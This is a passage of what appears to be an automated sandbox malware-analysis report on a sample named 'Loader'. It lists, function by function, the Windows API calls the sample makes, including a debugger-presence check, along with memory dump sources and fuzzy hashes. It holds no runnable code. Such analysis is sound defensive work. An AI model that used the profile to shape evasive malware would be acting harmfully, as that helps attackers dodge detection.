                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: df208ad1a9e06ac953777d7a6130a729f5687d97a73c3ca822d0c72f624548fe
                                                                                                                • Instruction ID: 05526bac416a5e26e9e3ff4ce9b3bc61fc0140098cf63e7e4199828b13249f81
                                                                                                                • Opcode Fuzzy Hash: df208ad1a9e06ac953777d7a6130a729f5687d97a73c3ca822d0c72f624548fe
                                                                                                                • Instruction Fuzzy Hash: 1CE06D31620A21E6EA216AA69C06F5F3698DF417F0F3A0123EE259A390EF60CD4191E1
                                                                                                                APIs
                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00CDAB6D,00000002,00000000,?,?,?,00CDAB6D,?,00000000), ref: 00CDB250
                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00CDAB6D,00000002,00000000,?,?,?,00CDAB6D,?,00000000), ref: 00CDB279
                                                                                                                • GetACP.KERNEL32(?,?,00CDAB6D,?,00000000), ref: 00CDB28E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID: ACP$OCP
                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                • Opcode ID: dd29c6e02400997879cbc736c3e00cdfd5391a457f83710846e7202b044d1160
                                                                                                                • Instruction ID: 7b4f75154e5650e4de5f2aa340222c764dfda8cd670a65059e55a72b52addca5
                                                                                                                • Opcode Fuzzy Hash: dd29c6e02400997879cbc736c3e00cdfd5391a457f83710846e7202b044d1160
                                                                                                                • Instruction Fuzzy Hash: 4E21AF63A00101EADB348F69C941B9F73A6AF54F60B57842AEA2ADB314E732DF40C350
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CDAB3F
                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00CDAB7D
                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00CDAB90
                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CDABD8
                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CDABF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 415426439-0
                                                                                                                • Opcode ID: fda1c56f1a7f0c9a63ced4dbe06ff53259948b65b3476b7f42a18d2d6ce3b337
                                                                                                                • Instruction ID: 0bc2ae38e98a575a0ddf227704418bfcae0cfc189d0bc7a660b65386a9369dc8
                                                                                                                • Opcode Fuzzy Hash: fda1c56f1a7f0c9a63ced4dbe06ff53259948b65b3476b7f42a18d2d6ce3b337
                                                                                                                • Instruction Fuzzy Hash: D3518271A00205AFDF20DFA5CC85BBE73B9EF44710F04456BEA14EB291E7719A41DB62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                • API String ID: 0-2761157908
                                                                                                                • Opcode ID: aea84e811daac4b6319c64fb8b7f1a1d5fc5a942ace583181332c914cf2c952b
                                                                                                                • Instruction ID: 769ecc9270d4649a5df0292ea59dc6c751699adfd381716e437a004babf578c3
                                                                                                                • Opcode Fuzzy Hash: aea84e811daac4b6319c64fb8b7f1a1d5fc5a942ace583181332c914cf2c952b
                                                                                                                • Instruction Fuzzy Hash: C2D23A71E082698FDB64CE29DD407EAB7B5EB44305F1841EAD81DE7240DB78AF858F81
                                                                                                                APIs
                                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CDB889
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 1974802433-0
                                                                                                                • Opcode ID: 3cee2dd2c1a2b240f0dc8664f8bea7dd7493bb2842715915a0692a4db6a6eac2
                                                                                                                • Instruction ID: 6940fa6ab960147cafb6a810149827cc87c7d371fbf121564f9f8a38725a8ea8
                                                                                                                • Opcode Fuzzy Hash: 3cee2dd2c1a2b240f0dc8664f8bea7dd7493bb2842715915a0692a4db6a6eac2
                                                                                                                • Instruction Fuzzy Hash: EE71C071D051699FDF20AF288C99ABEB7B8AF05300F1541DBE61DA7351EB318E85AF10
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00CC9A7F
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00CC9B4B
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CC9B64
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00CC9B6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                • String ID:
                                                                                                                • API String ID: 254469556-0
                                                                                                                • Opcode ID: c9e219896418913f1c6436ec006c521fcbf7f52045f68ee682412900a6ae19dd
                                                                                                                • Instruction ID: 8a73a1ef376d030a2178dddb642ca8749a23eadf193294cf21278936531b1939
                                                                                                                • Opcode Fuzzy Hash: c9e219896418913f1c6436ec006c521fcbf7f52045f68ee682412900a6ae19dd
                                                                                                                • Instruction Fuzzy Hash: 4131D775D05219DBDB21DFA4D989BCDBBF8AF08300F1041EAE40CAB250EB719B859F45
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CCA347
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00CCA356
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00CCA35F
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00CCA36C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2933794660-0
                                                                                                                • Opcode ID: 41310779a6c5ecc8dc55aeaa54b0bfbfcdf6f0d630f502492cdebec27cc5a48f
                                                                                                                • Instruction ID: f33570a07a3acbabb6eb70d5581a6b9067d868c49435c9d1e475b56a06e03d0d
                                                                                                                • Opcode Fuzzy Hash: 41310779a6c5ecc8dc55aeaa54b0bfbfcdf6f0d630f502492cdebec27cc5a48f
                                                                                                                • Instruction Fuzzy Hash: 79F06274D1024DEBCB00EBB4DA89A9EBBF8FF1C244B9159A5A412EB150E730AB449F51
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00CC96B0,00CE6C8C), ref: 00CC96B8
                                                                                                                • UnhandledExceptionFilter.KERNEL32(00CC96B0,?,00CC96B0,00CE6C8C), ref: 00CC96C1
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00CC96B0,00CE6C8C), ref: 00CC96CC
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00CC96B0,00CE6C8C), ref: 00CC96D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3231755760-0
                                                                                                                • Opcode ID: 9724667a8b1ebd4b36daae28e541807cae41d33aba8b1eef62f58cdc03255e92
                                                                                                                • Instruction ID: 210dc43554427c696cddb980a2614deb62bf2fe2e5041468c74bdb4ff40bfbc8
                                                                                                                • Opcode Fuzzy Hash: 9724667a8b1ebd4b36daae28e541807cae41d33aba8b1eef62f58cdc03255e92
                                                                                                                • Instruction Fuzzy Hash: F5D01232001288ABDB802BE0EC8CB8D3FA8FB08392F044400F70A8A062CB3544008B66
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDAD84
                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDADCE
                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDAE94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 661929714-0
                                                                                                                • Opcode ID: 44ef87d0151c07a054332fa7f8c1c70310c69540ec8b8055094327707fa20c19
                                                                                                                • Instruction ID: 297bd8f46628641197697412a10bb276f8062f79da6750533524565d39580479
                                                                                                                • Opcode Fuzzy Hash: 44ef87d0151c07a054332fa7f8c1c70310c69540ec8b8055094327707fa20c19
                                                                                                                • Instruction Fuzzy Hash: 4761BF715102179FDB289F28CC82BBAB7A8EF04310F1441BBEA15C6791E734EE90DB55
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CD1B58
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CD1B62
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CD1B6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 3906539128-0
                                                                                                                • Opcode ID: a326f8f25d82953bf2d0b322f6059b90f4d79aab2283d63e2787143b0ffe9f67
                                                                                                                • Instruction ID: 6aed2bd13c03915be6f23f0a1819f42ba87f2fdc1ef5de0c5a567006b78eb316
                                                                                                                • Opcode Fuzzy Hash: a326f8f25d82953bf2d0b322f6059b90f4d79aab2283d63e2787143b0ffe9f67
                                                                                                                • Instruction Fuzzy Hash: 7E31C4B490122CABCB21DF68D989BDDBBB8BF08750F5041DAE81CA7251E7709B859F44
                                                                                                                APIs
                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CDE9E9,?,?,00000008,?,?,00CE539B,00000000), ref: 00CDECBB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID:
                                                                                                                • API String ID: 3997070919-0
                                                                                                                • Opcode ID: aadaf2219873b3bca12da7265599c0a2f4e7b0e99d51d66b5cf9ab88d2ac83a5
                                                                                                                • Instruction ID: be7144e7e64be425ede60c4a0a844d5b0e88ad90cae6105c29c81f5545142313
                                                                                                                • Opcode Fuzzy Hash: aadaf2219873b3bca12da7265599c0a2f4e7b0e99d51d66b5cf9ab88d2ac83a5
                                                                                                                • Instruction Fuzzy Hash: 10B18F31110608DFD715DF28C48AB657BE1FF45364F25865AE9AACF3A1C735EA81CB40
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CC96F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                • String ID:
                                                                                                                • API String ID: 2325560087-0
                                                                                                                • Opcode ID: eb43636a860da7de4d7b83614eb74c349afb2422c503bd92c23980adf0d1e72a
                                                                                                                • Instruction ID: e4220a074293cc6f22d7416bf2ee780968d1715357cceaef8772b8a6e688abdc
                                                                                                                • Opcode Fuzzy Hash: eb43636a860da7de4d7b83614eb74c349afb2422c503bd92c23980adf0d1e72a
                                                                                                                • Instruction Fuzzy Hash: 36A17CB19112098BDB18CF54DC857ADBBF0FB48754F29912ED426E72A2D3749A40CFD1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD69F4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00CD5B8F,00000001,00000364,00000002,000000FF,?,00000000,?,00CCD655,00000000,?), ref: 00CD6A35
                                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CDB889
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00CDB97D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00CDB9BC
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00CDB9EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2701053895-0
                                                                                                                • Opcode ID: 48d9d797b137af1ed79cd626677604407b68c262b0fe5950dc908eb63502308a
                                                                                                                • Instruction ID: b806b473cbfd570b1435881bf54f9fb7e458f5b8529071f9b03537e98867c608
                                                                                                                • Opcode Fuzzy Hash: 48d9d797b137af1ed79cd626677604407b68c262b0fe5950dc908eb63502308a
                                                                                                                • Instruction Fuzzy Hash: 61514875900118EFDF24AF389C85ABEB7A9DF85344F16419FF52997341EB308E42AB60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDB044
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 3736152602-0
                                                                                                                • Opcode ID: 0da942e3d41b7cbc6ebd207d3639901087b4a5bbbdb47995486cfaf1b7c88a70
                                                                                                                • Instruction ID: c3948083a9adeeeb86c6adc2c123e1d2fdf74546efbea569b500c33f32ff7f34
                                                                                                                • Opcode Fuzzy Hash: 0da942e3d41b7cbc6ebd207d3639901087b4a5bbbdb47995486cfaf1b7c88a70
                                                                                                                • Instruction Fuzzy Hash: 34218072600206EBDF289A25DC91ABB77A8EF44710B11406FFA26C6281EB74BE419B54
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 0-4108050209
                                                                                                                • Opcode ID: 2e9dc75f95af63d7e3f0467b09800d07243cdb8f01b56e2c73d403b8a0587b55
                                                                                                                • Instruction ID: f79a73cc2af1580bcd04d6be195e35aa7dd7171552ceaa1f8f29e6f7f32f3133
                                                                                                                • Opcode Fuzzy Hash: 2e9dc75f95af63d7e3f0467b09800d07243cdb8f01b56e2c73d403b8a0587b55
                                                                                                                • Instruction Fuzzy Hash: 00B1C27090060A8BCB24DF69C955FBEB7B1AF16300F14062DE5A39B691DB31EB02DB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDB164
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
